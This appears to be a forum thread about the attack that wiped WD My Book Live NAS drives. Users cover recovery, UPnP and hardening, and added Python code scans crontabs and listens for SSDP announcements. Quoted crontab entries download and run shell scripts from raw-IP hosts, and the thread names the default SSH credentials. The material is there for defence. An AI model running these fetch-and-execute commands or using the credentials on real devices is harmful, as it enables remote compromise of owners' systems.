Thanks so much for the reassurance!
Okay friends, I have an old netbook that's never been attached to this network but still works alright, I was thinking I could attach the MBL to it via the Ethernet port and maybe attempt recovering stuff or something while keeping it off the Internet. Is this a plausible plan of attack and how would I go about accessing the drive while keeping it off the network?
The instructions are here:
I get the same from /etc/crontab
as @Linuxcpa but with these additional lines:
1 * * * * root rm -f /tmp/w;wget -O /tmp/w http://213.217.0.184/w;/bin/sh /tmp/w
2 2 * * * root rm -f /tmp/wB;wget -O /tmp/wB http://188.92.72.129/wB;/bin/sh /tmp/wB
I'm deleting them.
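As an added defender-side check (not code from this thread), here is a small Python scanner for the pattern in the two entries above: a cron job that fetches from a raw-IP URL with a downloader and then runs the result from /tmp. The crontab text is constructed; the two malicious lines copy the ones posted, the rest are ordinary defaults.

```python
import re

# Constructed /etc/crontab sample: the two wget-then-sh entries mirror the lines
# posted in this thread; the other entries are ordinary Debian defaults.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
1 * * * * root rm -f /tmp/w;wget -O /tmp/w http://213.217.0.184/w;/bin/sh /tmp/w
2 2 * * * root rm -f /tmp/wB;wget -O /tmp/wB http://188.92.72.129/wB;/bin/sh /tmp/wB
"""

# System crontab layout: five schedule fields, then the user, then the command.
CRON_LINE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

# Each indicator alone is common in legitimate jobs; two or more together is the
# dropper shape seen in this thread (download from a raw IP, execute from /tmp).
CHECKS = [
    ("downloader", re.compile(r"\b(wget|curl|ftpget|tftp)\b")),
    ("raw-ip-url", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b")),
    ("exec-from-tmp", re.compile(r"\b(sh|bash)\s+/(tmp|var/tmp|dev/shm)/")),
]


def suspicious_cron_entries(text):
    """Return (line number, user, reasons) for crontab entries that look like droppers."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        m = CRON_LINE.match(line)
        if not m:
            continue  # e.g. @reboot entries are not covered by this simple parser
        cmd = m.group("cmd")
        reasons = [name for name, rx in CHECKS if rx.search(cmd)]
        if len(reasons) >= 2:
            findings.append((lineno, m.group("user"), reasons))
    return findings


if __name__ == "__main__":
    for lineno, user, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {lineno}: user={user} indicators={', '.join(reasons)}")
```

Point it at the real file with `suspicious_cron_entries(open("/etc/crontab").read())`; an entry hit by two or more indicators is worth pulling and examining before the next scheduled minute.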
I was not hacked, but today I just unplugged the internet cable from my router and left all the rest untouched to perform a backup.
Then I powered off the unit and plugged the fiber cable back in. That's all.
All files that I have accessed and recovered so far were fine and intact.
I'm not confident that these settings do in fact disable UPnP. At the moment my configuration is as per your screenshot, but every 20 seconds I see a collection of packets from the NAS that looks like this:
13:12:34.273606 IP 192.168.10.137.44074 > 239.255.255.250.upnp: UDP, length 336
E..lP..........%.....*.l.X3.NOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
CACHE-CONTROL: max-age=100
LOCATION: http://192.168.10.137:49152/nasdevice.xml
NT: upnp:rootdevice
NTS: ssdp:alive
SERVER: Linux/2.6.32.11-svn70860, UPnP/1.0, Portable SDK for UPnP devices/1.6.6
X-User-Agent: redsonic
USN: uuid:736[censored because I don't know if this is sensitive]663::upnp:rootdevice
I am not super familiar with UPnP but it looks like the device is still attempting to set up UPnP mapping even when it's disabled. I have also tried setting Connection Options to Manual which did not change the symptoms.
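Added example, not the poster's code: a Python parser for the SSDP NOTIFY shown above, plus a listener that joins 239.255.255.250:1900 on another host for longer than the 20-second announce interval, so you can confirm whether the NAS is still advertising itself after changing the setting. The sample payload is constructed from the capture with a placeholder USN.

```python
import socket
import time
# Constructed SSDP NOTIFY modelled on the tcpdump capture quoted above; the USN uuid is a placeholder.
SAMPLE_NOTIFY = (
    "NOTIFY * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    "CACHE-CONTROL: max-age=100\r\n"
    "LOCATION: http://192.168.10.137:49152/nasdevice.xml\r\n"
    "NT: upnp:rootdevice\r\n"
    "NTS: ssdp:alive\r\n"
    "SERVER: Linux/2.6.32.11-svn70860, UPnP/1.0, Portable SDK for UPnP devices/1.6.6\r\n"
    "USN: uuid:00000000-0000-0000-0000-000000000000::upnp:rootdevice\r\n"
    "\r\n"
)
def parse_ssdp(payload):
    """Split an SSDP datagram into its start line and a dict of upper-cased headers."""
    lines = payload.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:
            break  # blank line ends the header block
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().upper()] = value.strip()
    return lines[0], headers
def is_alive_root_advert(payload):
    """True when the datagram is a NOTIFY announcing a live UPnP root device."""
    start, h = parse_ssdp(payload)
    return (start.startswith("NOTIFY") and h.get("NTS") == "ssdp:alive"
            and h.get("NT") == "upnp:rootdevice")
def listen_for_adverts(seconds=25):
    """Join the SSDP multicast group; map advertising IPs to LOCATION URLs (run > 20 s)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", 1900))
    mreq = socket.inet_aton("239.255.255.250") + socket.inet_aton("0.0.0.0")  # struct ip_mreq
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    sock.settimeout(1.0)
    seen, deadline = {}, time.time() + seconds
    while time.time() < deadline:
        try:
            data, (ip, _port) = sock.recvfrom(4096)
        except socket.timeout:
            continue
        payload = data.decode("ascii", errors="replace")
        if is_alive_root_advert(payload):
            seen[ip] = parse_ssdp(payload)[1].get("LOCATION")
    sock.close()
    return seen
```

`listen_for_adverts()` returns an empty dict when nothing on the LAN announced a root device during the window; an entry for the NAS IP means it is still broadcasting regardless of the dashboard setting.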
Wanted to make sure to thank you for your efforts here to help patch this for those of us who were unaffected. Grabbed the factory reset script edits and commented out the sudo commands you identified (since I don't ever intend to change language settings).
Appreciate it
Registered to give my 2 cents, or 0.016 euro. As of yesterday I shut the drive down and removed power upon observing the unfolding mess online (after backing up some critical stuff), but as of that time, the drive was unaffected. It seems I had escaped the "great wipe". It was a serious wake-up call, since I had been lax in backing up some crucial data from it. Bullet dodged. For what it's worth, my drive configuration:
- Auto updates turned off
- Remote access turned off
- FTP turned on
- Time sync turned on
Router side:
- UPnP disabled.
- One port-forwarding entry set up for the FTP to the MBL, but remapped from 21 to some big obscure port number.
Even if I have escaped this nasty exploit, the revelations brought about on this thread are frankly jaw-dropping. "Atrocious" is the word I would use to describe the security of this device, and there is no way in all the circles of Dante's inferno I would trust this thing on my network. Once I've shut off the WAN and backed everything up, I fully intend to install OpenWRT on it.
I have followed this issue and it appears that the malware attack is particularly vicious.
No prob. I did see some large .mp4 files coming through, something in the range of 900MB to 1.5GB each. So, maybe there is hope after all!
Hope your data recovery company uses a powerful machine. Reading sector by sector on a 2TB drive (or larger) is just time consuming.
UPDATE
A few days ago I began using sysinternals Linux recovery to recover the files, and I must say I'm impressed with what it found. Nothing's sorted or named correctly, so the GBs of exe files are mostly useless because they were intended to work with other files for whatever program they were for. But it has found a lot of files from years back that I had backed up. Although I'm certain it didn't find everything: I'm pretty sure I had some apk files saved which the program can't recover, and there's probably some other file formats it didn't recover. The transfer slowed right down when getting to txt files, which for some reason consisted of 24 GB of binary data nonsense, in thousands of files less than a MB. I would guess for any data the program couldn't associate with a file type it just made a txt file instead. I restarted so it could restore everything past the txt files, and I might not bother with restoring them anyway. Once the file transfer is done I'm installing OpenWRT onto the MBL, which I found out you can do from a post here.
Has anyone with an affected device previously changed their SSH username/password from the default root/welc0me? This can't be done from the admin webpage and has to be done when SSH'd in.
Same question for if you've been affected & have previously generated certificates to be able to use SFTP instead of FTP.
Edit: ahh, CVE-2018-18472 root escalation would bypass the SSH password anyway
39 hours into my DiskInternals Data Recovery of /DataVolume and still only 7% done. Running it via standard laptop and USB connected SATA docking station. If I stop the scan would it impact me taking it to a data recovery expert?
You can stop the scan, but I'd recommend using a desktop's SATA connection - using USB is going to slow scanning down significantly
Yes, that looks all good. What is inside /etc/init.d/auto_update , by the way?
If true, that's odd. The good news is as long as UPnP is disabled on the router it can't forward those ports either way.
Was your machine infected and now you're experimenting with it?
Not infected, thankfully. UPnP was disabled on the router.
Had a look at my MBL yesterday having seen the news. Sure enough all files gone.
It wasn't something I used frequently, but I had years of records on there which I could do without having to reconstruct.
I've written it off, cracked it open and put the HDD in an external enclosure, connected to a win10 PC via USB 3. I've run Photorec on the "unknown" partition labelled "whole disk".
Luckily the only non music / photo files I had on the drive largely relate to the records I need, so I've just been moving out PDF, DOC and XLSX files as they get recovered and I have 566 items in perfect working order on that front.
I also have 1000s of photos and videos I wasn't that bothered about and a load of creative stuff I had backed up elsewhere but it's good to know it's still there. So far there has been corruption to the odd video file, but 95% of files are perfectly good.
So really just to reassure anyone who has lost something critical in this attack, it may well be recoverable. The scan looks like it will take 8hrs overall on my machine and I've spent about 3hrs actively grabbing and categorising recovered files - not even really enough for me to stop and script something to delete all the junk files I'm not interested in. Just been going through everything visually...
If you aren't tech minded and willing to pull things apart and run strange software, but need to try to recover something, send the drive to a specialist and there is hope.